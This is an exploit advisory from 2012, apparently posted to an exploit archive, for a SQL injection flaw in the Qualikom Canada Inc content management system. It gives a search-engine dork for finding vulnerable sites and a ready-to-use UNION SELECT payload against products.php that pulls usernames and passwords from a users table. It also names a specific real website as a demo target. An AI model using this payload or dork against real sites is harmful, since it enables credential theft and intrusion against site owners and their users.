Qualikom Canada Inc CMS suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
d65fe9345a8221a6bcd25f5ae72aaecccd8afbc7cdb9c0531037062ff55e9ec7
###################################################################################
# Exploit Title: Qualikom Canada Inc cms Sql Injection Vulnerability
#
# Google Dork:intext:"Powered by Qualikom Canada Inc."
#
# Date: 08/24/2012
#
# Author: Crim3R
#
# Vendor Home http://www.qualikom.com/
#
# Tested on: all
#
###################################################################################
$
$ ----Author will be not responsible for any damage----
$
###################################################################################
========================================
http://www.target.com/products.php?id=-[id]'
+union+select+1,2,concat(uname,0x3a,upass),4,5+from+users--
D3M0 :
http://www.woodbridgeparty.com/products.php?id=144
===============Crim3R@Att.Net===========
$home = %00
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir